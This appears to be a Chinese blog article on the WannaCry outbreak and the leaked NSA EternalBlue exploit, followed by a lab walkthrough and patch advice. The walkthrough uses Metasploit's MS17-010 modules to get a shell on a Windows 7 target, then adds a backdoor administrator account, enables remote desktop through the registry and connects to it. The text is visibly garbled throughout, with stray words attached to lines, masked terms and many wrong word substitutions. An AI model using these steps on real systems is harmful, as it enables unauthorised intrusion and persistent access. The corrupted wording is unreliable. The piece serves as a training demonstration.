2017年5月,被称为近10年来影响范围最普遍“最嚣张”的WannaCry勒索病毒席卷全球,据统计,全球共有150多个国家超30万台终端被感染,波及政府、学校、医院、金融、航班等各行各业。html
一旦中了WannaCry病毒,则电脑文件会被“加密劫持”,***要求受害者支付高昂赎金(比特币)才能拿到解密秘钥。当时互联网上有不少人确实尝试经过支付赎金解决“被挟持的电脑”,毕竟多年的工做和学习资料比起赎金来说,价值更大。而实际上,不少人即使打钱过去,也无济于事。shell
为何WannaCry病毒可以在短短一个月时间,对全球形成这么大的危害?这里就必须提到今天的主角:“永恒之蓝”。编程
时间追溯到2016年,全球神秘***组织影子经纪人( Shadow Brokers)***了另一支技术高超的***团队
方程式组织(Equation Group),并拿到后者部分泄密武器。而方程式组织其实即是NSA(美国国家安全局)旗下的***团队,正所以,由国家支持的“核武器级网络军火库”正式浮出水面。c#
Shadow Brokers在拿到这批武器以后,原本打算以100万比特币(当时价值5亿美圆)出售这批“网络军火库”,但最终没有人支付这笔天价费用。windows
直到2017年4月14号,Shadow Brokers干脆直接在Github上公开整个武器库,大量的针对Windows零日漏洞***武器被公开,其中,就包括了上面提到的“永恒之蓝”***代码。(Eternalblue) 安全
绕了这么一大圈,其实就是想告诉你们一点:网络
这枚WannaCry勒索病毒,就是***拿着美国安全局泄露的永恒之蓝***代码进行研制,并进行大肆勒索传播。框架
关于这一点,微软于2017年5月也公开指责NSA:“美国安全局正是全球勒索病毒的发源地,政府所持有的零日漏洞被泄露到公共领域,形成不可损失的破坏”ide
直到如今,不少普通用户仍然单方面吐槽“这是由于Windows系统不够安全”,把问题直接归结于微软。而实际上,在这件事情上,微软才是真正的“背锅侠”,由于Windows系统在2017年3月14号就早早推送了MS17-010的安全更新,若用户打上这个补丁,就能够避免此次***。可是,大量的普通用户没有更新打补丁的习惯,更不用说那些采用Ghost盗版系统的用户了。工具
虽然不少人已经从各类新闻报道和“我的经历”已经知晓这枚病毒的威力,可是在这里咱们仍是花了不少给你们普及了它的前因后果,并在这里给你们一个观点:
[WannaCry事件] 是21世纪网络安全领域的一个标志性事件,意味着:
国家级别的网络安全对抗早就在秘密展开了,如今被一些***组织“戳破”了;
******事件已经彻底***到真实世界里,“比特世界”和“原子世界”边界完全被打破;
谁掌握零日漏洞以及对应的***武器,谁在“第五空间”就有话语权;
相似WannaCry的病毒会愈来愈多,而且频率愈来愈高,例如Bad Rabbit、NotPetya……
Kali Linux 2017.03 + Windows 7 sp1
***机:Kali Linux (ip:172.16.70.216)
靶机:Windows 7 sp1 (ip:172.16.70.199)
永恒之蓝漏洞刚出来的时候,当时不少人是用Shadow Brokers泄露的NSA原生***工具来测试,经过“ Fuzzbunch + Eternalblue 组合拳 ”,虽然能够作出getshell效果,可是整个实现过程很是麻烦,不太适合安全新手进行快速实践。到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的***测试代码,针对Win7和Server2008能够实现getshell,几分钟内就能够将完成整个漏洞复现过程。
注:此实验环境所用***机和靶机,跟以前文章所分享一致,能够参考往期推文,并下载所需镜像=>
三、实验流程
msfconsole
msf > search ms17_010
这里能够获得两个工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,exploit/windows/smb/ms17_010_eternalblue是永恒之蓝***代码,通常配合使用,前者先扫描,若显示有漏洞,再进行***。
使用模块 msf > use auxiliary/scanner/smb/smb_ms17_010
设置目标IP或网段 msf auxiliary(smb_ms17_010) > set RHOSTS 172.16.70.199
执行扫描 msf auxiliary(smb_ms17_010) > run
使用模块 msf > use exploit/windows/smb/ms17_010_eternalblue
查看可设置的选项 msf exploit(ms17_010_eternalblue) > show options
设置***目标ip msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199
执行*** msf exploit(ms17_010_eternalblue) > exploit
从最终效果来看,此时Kali Linux经过MS17-010***代码,直接拿到Win7的Shell,以后即可以经过Shell对目标靶机进行控制。
建立用户名密码 blue/blue net user blue blue /add
将用户blue添加入管理组 net localgroup administrators blue /add
开启远程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面链接Win7 rdesktop 172.16.70.199:3389
能够看到,最终Kali经过shell新建了用户,并经过远程桌面链接到目标靶机上。
固然,上面这是一个简单的演示,告诉你们这个漏洞很危险,真正的***能作的事情更多,因此仍是要多打补丁或按照安全软件。
①在线更新;开启Windows Update更新。
②打补丁;此漏洞对应的微软补丁地址:https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
=====================